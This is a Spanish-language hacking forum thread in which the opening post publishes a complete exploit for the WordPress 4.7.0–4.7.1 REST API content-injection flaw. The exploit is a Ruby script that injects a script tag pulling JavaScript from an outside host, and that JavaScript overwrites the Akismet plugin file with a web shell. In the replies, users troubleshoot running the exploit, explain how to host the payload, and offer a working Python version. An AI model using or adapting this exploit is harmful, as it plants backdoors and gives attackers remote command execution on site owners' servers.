Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

WordPress 4.7.0 / 4.7.1 Content Injection / Code Execution

  • 8 Respuestas
  • 6896 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5473
  • Actividad:
    21.67%
  • Reputación 35
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Febrero 02, 2017, 04:21:04 pm »

Acaba de salir una actualización de Wordpress debido a esta falla de seguridad.
Hay muchos Wordpress desactualizados que aún poseen esta vulnerabilidad.

Código: Text
  1. # Exploit Title: WP Content Injection Shell Exploit
  2. # Date: 31 Jan' 2017
  3. # Exploit Author: Harsh Jaiswal
  4. # Vendor Homepage: http://wordpress.org
  5. # Version: Wordpress 4.7 - 4.7.1 (Patched in 4.7.2)
  6. # Tested on: Bacbox ubuntu Linux
  7. # Based on: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
  8. # This will inject js in post, which on execution will change akismet plugin index.php file to our backdoor (brute parameter) :)
  9. # Credits : Marc, Sucuri, Brute
  10. # Lang : Ruby
  11.  
  12. require 'rest-client'
  13. require 'json'
  14. puts "Enter Target URI (With wp directory)"
  15. targeturi = gets.chomp
  16. puts "Enter Post ID"
  17. postid = gets.chomp.to_i
  18. response = RestClient.post(
  19.   "#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
  20.   {
  21.     "id" => "#{postid}justtryingshell",
  22.     "title" => "Shell Access Exploit",
  23.     "content" => "Web shell access exploit <script src='http://yourjavascript.com/2211227783/wprce.js'></script>"
  24.   }.to_json,
  25.   :content_type => :json,
  26.   :accept => :json
  27. ) {|response, request, result| response }
  28. if(response.code == 200)
  29. puts "Done! After js execution in admin panel, you will have shell access at '#{targeturi}/wp-content/plugins/akismet/index.php?brute=id'"
  30. else
  31. puts "This site is not Vulnerable"
  32. end
  33.  
  34.  
  35. #--- wprce.js --- #
  36. x=new XMLHttpRequest()
  37. p='/wp-admin/plugin-editor.php?'
  38. f='file=akismet/index.php'
  39. x.open('GET',p+f,0)
  40. x.send()
  41. $='_wpnonce='+/ce" value="([^"]*?)"/.exec(x.responseText)[1]+'&newcontent=<?=`$_GET[brute]`;&action=update&'+f
  42. x.open('POST',p+f,1)
  43. x.setRequestHeader('Content-Type','application/x-www-form-urlencoded')
  44. x.send($)
  45. #--- EOF --- #

Saludos,
ANTRAX


Desconectado Dr4g0n4Y

  • *
  • Underc0der
  • Mensajes: 27
  • Actividad:
    0%
  • Reputación 1
  • El objetivo es lo imposible
    • Ver Perfil
    • Email
« Respuesta #1 en: Febrero 02, 2017, 05:01:33 pm »
Buen post Antrax,
Al ejecutarlo en ruby el archivo al que llame hello.rb me muestra el error siguiente, al ser casi nulo mi conocimiento en ruby quisiera verificar si es un error en el código

Código: Ruby
  1. ruby 1.9.3p484 (2013-11-22 revision 43786) [i686-linux]
  2. unknow@unknow:~/Escritorio$ ruby hello.rb
  3. hello.rb:41: syntax error, unexpected tSTRING_BEG, expecting $end
  4.     $='_wpnonce='+/ce" value="([^"]*...
  5.       ^

Desconectado #_Krypt05

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Febrero 03, 2017, 12:07:54 am »
tengo el mismo error :(

Desconectado seth

  • *
  • Underc0der
  • Mensajes: 264
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
« Respuesta #3 en: Febrero 03, 2017, 01:17:00 am »
Leen el codigo antes de ejecutarlo? esa parte es javascript

Desconectado Voodoo2k

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Febrero 15, 2017, 06:01:35 pm »
Pues va a ser hora de actualizar esos Wordpress que tengo por ahí. Pero primero a probar un poquito esta vulnerabilidad. Muchísimas gracias por compartir la información.

Desconectado DUDA

  • *
  • Underc0der
  • Mensajes: 334
  • Actividad:
    0%
  • Reputación 1
  • Hago pocas cosas, pero las hago bien.
    • Ver Perfil
« Respuesta #5 en: Febrero 15, 2017, 07:03:28 pm »
Hola @seth de CPH (creo), poco sé de programación pero soy administrador de servidores cloud hosting y ufff clientes a miles con WordPress, ¿alguna forma de probar esta vulnerabilidad?

Gracias,
!Duda
Leen el codigo antes de ejecutarlo? esa parte es javascript

Desconectado Dr4g0n4Y

  • *
  • Underc0der
  • Mensajes: 27
  • Actividad:
    0%
  • Reputación 1
  • El objetivo es lo imposible
    • Ver Perfil
    • Email
« Respuesta #6 en: Febrero 21, 2017, 05:08:20 pm »
Hola @seth de CPH (creo), poco sé de programación pero soy administrador de servidores cloud hosting y ufff clientes a miles con WordPress, ¿alguna forma de probar esta vulnerabilidad?

Gracias,
!Duda
Leen el codigo antes de ejecutarlo? esa parte es javascript
Claro que sí hay manera, nunca entendí porque seth dijo que 'leen el código antes de ejecutarlo' es algo estúpido porque el código aún siendo javascript está siendo mostrado en el script en ruby es como mostrar en c printf("alert(hello)");  Y decir que no compilara porque tiene javascript , en fin si quieres un script hecho en python que si funciona mandame un mensaje
« Última modificación: Febrero 21, 2017, 05:10:55 pm por dragonay »

Desconectado seth

  • *
  • Underc0der
  • Mensajes: 264
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
« Respuesta #7 en: Febrero 22, 2017, 10:53:19 pm »
Hola @seth de CPH (creo), poco sé de programación pero soy administrador de servidores cloud hosting y ufff clientes a miles con WordPress, ¿alguna forma de probar esta vulnerabilidad?

Gracias,
!Duda
Leen el codigo antes de ejecutarlo? esa parte es javascript
Claro que sí hay manera, nunca entendí porque seth dijo que 'leen el código antes de ejecutarlo' es algo estúpido porque el código aún siendo javascript está siendo mostrado en el script en ruby es como mostrar en c printf("alert(hello)");  Y decir que no compilara porque tiene javascript , en fin si quieres un script hecho en python que si funciona mandame un mensaje

vos tampoco lo leiste


El exploit tiene dos archivos: uno en ruby y uno en javascript
El .js lo tenes que subir a un hosting y cambiar la url en el otro archivo
Despues corres con ruby la otra parte


Hola @seth de CPH (creo), poco sé de programación pero soy administrador de servidores cloud hosting y ufff clientes a miles con WordPress, ¿alguna forma de probar esta vulnerabilidad?

Gracias,
!Duda
Leen el codigo antes de ejecutarlo? esa parte es javascript

Usa hasta la parte que dice end y el javascript no lo subas a ningun lado
No va a andar todo el exploit pero, si esto anda bien, deberias poder ver que hay un tag <script> en el comentario

Desconectado seek3r

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: scarface.ferro
« Respuesta #8 en: Junio 20, 2017, 06:06:23 am »
Genial, estaba buscando un exploit para esta vuln, me volvia loco haciendolo manualmente

 

¿Te gustó el post? COMPARTILO!



vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection

Iniciado por morodog

Respuestas: 1
Vistas: 2251
Último mensaje Junio 09, 2013, 12:05:31 pm
por ANTRAX
SQL Injection - Joomla módulo "com_fireboard"

Iniciado por M5f3r0

Respuestas: 0
Vistas: 2196
Último mensaje Agosto 16, 2013, 01:43:18 am
por M5f3r0
[Curso] SQL Injection desde 0 - Union based y Blind Boolean Based.

Iniciado por M5f3r0

Respuestas: 8
Vistas: 10983
Último mensaje Abril 21, 2017, 04:36:34 am
por M5f3r0
Mysql injection avanzada: "doble query/error based"

Iniciado por q3rv0

Respuestas: 2
Vistas: 3051
Último mensaje Agosto 30, 2012, 04:26:01 am
por andrewtwo
Ataque de diccionario cracking CMS Wordpress/Joomla Backtrack5r2 (Hacking/Deface

Iniciado por andrewtwo

Respuestas: 0
Vistas: 2273
Último mensaje Septiembre 02, 2012, 02:12:40 am
por andrewtwo